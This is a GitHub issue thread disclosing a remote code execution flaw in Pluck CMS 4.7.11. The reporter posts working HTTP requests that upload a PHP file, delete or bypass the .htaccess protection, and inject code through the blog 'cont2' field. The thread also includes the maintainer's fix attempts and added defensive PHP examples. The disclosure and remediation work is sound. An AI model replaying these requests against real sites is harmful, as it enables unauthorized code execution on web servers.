pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org

Pluck 4.7.11 admin backend has a remote command execution vulnerability when uploading files #91

Closed wooyin closed 4 years ago

wooyin commented 4 years ago

Pluck 4.7.11 admin backend has a remote command execution vulnerability when uploading files

Proof, step 1: log in -> pages -> manage files, upload a .htaccess file to turn files/.htaccess into .htaccess.txt

Step 2: throw .htaccess.txt into the trash

Step 3: upload the shell code

POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream

<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"

Upload
-----------------------------18467633426500--

Step 4: view http://127.0.0.1/pluck4711/files/pass07.php

BSteelooper commented 4 years ago

Thanks... good find... Missed this in the testing. .htaccess will now be ignored when uploaded.

BSteelooper commented 4 years ago

Could you try the https://github.com/pluck-cms/pluck/tree/4.7.12-dev1 release?

wooyin commented 4 years ago

Can bypass like this:

GET /pluck-4.7.12-dev1/admin.php?action=deletefile&var1=.htaccess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1

wooyin commented 4 years ago

And this way:

POST /pluck-4.7.12-dev1/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 346
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="filefile"; filename=".htaccess..........."
Content-Type: application/octet-stream

-----------------------------293582696224464
Content-Disposition: form-data; name="submit"

Upload
-----------------------------293582696224464--

BSteelooper commented 4 years ago

How does this last one work? The ..... is not omitted, so it is not picked up by Apache?

BSteelooper commented 4 years ago

Could you do a retest with version https://github.com/pluck-cms/pluck/tree/4.7.12-dev2

wooyin commented 4 years ago

Use strtolower().

GET /pluck-4.7.12-dev2/admin.php?action=deletefile&var1=.htACcess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?action=files
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

wooyin commented 4 years ago

And you should solve this too.

cont2 is vulnerable:

POST /pluck-4.7.12-dev2/admin.php?module=blog&page=newpost HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?module=blog&page=newpost
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

cont1=11111&cont2=2';phpinfo();/*&cont3=22222&save_exit=Save+and+Exit
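
The cont2 payload above closes a single-quoted PHP string and injects a call, which implies the blog module writes the field into a PHP data file between quotes. The following is an added example, not pluck's code: a minimal writer with that weakness next to a hardened one that uses var_export(). The data-file layout, file names and variable names are assumptions, since the thread does not show pluck's actual storage format.

```php
<?php
// Added example, not pluck's code.  The payload "2';phpinfo();/*" only works
// if the field lands inside a single-quoted PHP string in a data file, so
// that layout is assumed here; variable and file names are also assumptions.

// Vulnerable: the submitted value is concatenated straight into PHP source.
function example_write_post_unsafe(string $path, string $cont2): void
{
    file_put_contents($path, "<?php\n\$post_content = '" . $cont2 . "';\n");
}

// Hardened: var_export() emits a PHP string literal with every ' and \
// escaped, so whatever was submitted stays inside the string when the
// file is later include'd.
function example_write_post_safe(string $path, string $cont2): void
{
    file_put_contents($path, "<?php\n\$post_content = " . var_export($cont2, true) . ";\n");
}

// How a module would read the field back from the data file.
function example_read_post(string $path): string
{
    $post_content = '';
    include $path;
    return $post_content;
}

$dir     = sys_get_temp_dir();
$payload = "2';phpinfo();/*";   // constructed; copied from the request body in the thread

example_write_post_unsafe("$dir/example_unsafe.php", $payload);
// Show the resulting source without including it: the quote in the payload
// terminates the string literal, so phpinfo() has become executable code.
echo file_get_contents("$dir/example_unsafe.php");

example_write_post_safe("$dir/example_safe.php", $payload);
// In this file the quote and backslash are escaped, so the value is still data.
echo file_get_contents("$dir/example_safe.php");
// Round trip: the value read back is byte-for-byte what was submitted.
var_dump(example_read_post("$dir/example_safe.php") === $payload);
```

var_export() is the minimal change because it escapes exactly the two characters that matter inside a single-quoted PHP literal; addslashes() would also escape double quotes and so alter the stored text. Storing posts as JSON or serialized data instead of PHP source removes this class of problem entirely.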

wooyin commented 4 years ago

I tested on Windows; the system deletes the trailing dots automatically.

BSteelooper commented 4 years ago

Ok.. I'll try to find a solution for the Windows mishaps.
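
The three file-name bypasses in this thread (the .htaccess upload, the .htACcess case variant, and Windows dropping the trailing dots of "pass07.php......") all come from checking the client-supplied name instead of the name the filesystem will actually create. The following normaliser is an added example, not pluck's code; the function and constant names are assumptions.

```php
<?php
// Added example (not pluck's own code): normalise an uploaded file name the
// way a hardened upload handler should, so that the bypasses shown in this
// thread collapse to the same decision.  Names below are assumptions.

const EXAMPLE_ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'];

/**
 * Return the name the upload may be stored under, or null to reject it.
 */
function example_safe_upload_name(string $clientName): ?string
{
    // Drop any path component the client sent ("../x", "C:\x", ...).
    $name = basename(str_replace('\\', '/', $clientName));

    // NTFS silently drops trailing dots and spaces when creating a file, so
    // "pass07.php......" is stored as "pass07.php".  Strip them first so the
    // checks below see the name the OS will actually use.
    $name = rtrim($name, ". ");

    // Compare case-insensitively: Apache looks for ".htaccess", and on a
    // case-insensitive filesystem ".htACcess" is that same file.
    $lower = strtolower($name);

    if ($lower === '' || $lower === '.' || $lower === '..') {
        return null;
    }
    // Refuse Apache configuration files outright (.htaccess, .htpasswd, ...).
    if (strncmp($lower, '.ht', 3) === 0) {
        return null;
    }
    // Allow-list the final extension; a deny-list of "php" misses phtml, php5, ...
    $ext = pathinfo($lower, PATHINFO_EXTENSION);
    if (!in_array($ext, EXAMPLE_ALLOWED_EXT, true)) {
        return null;
    }
    // Keep only a conservative character set in the stored name.
    return preg_replace('/[^A-Za-z0-9._-]/', '_', $name);
}

// Constructed inputs, taken from the bypass attempts in this thread plus two
// benign names for comparison.
foreach (['pass07.php......', '.htaccess...........', '.htACcess', 'logo.PNG', 'report.pdf.'] as $n) {
    echo $n, ' => ';
    var_dump(example_safe_upload_name($n));
}
```

The same normaliser should run on the var1 parameter of action=deletefile, so that ".htaccess" and ".htACcess" cannot be removed either. The extension allow-list complements the files/.htaccess that disables PHP execution in that directory; it does not replace it, because a name like shell.php.jpg passes the allow-list and only the directory configuration keeps Apache from handing it to the PHP handler.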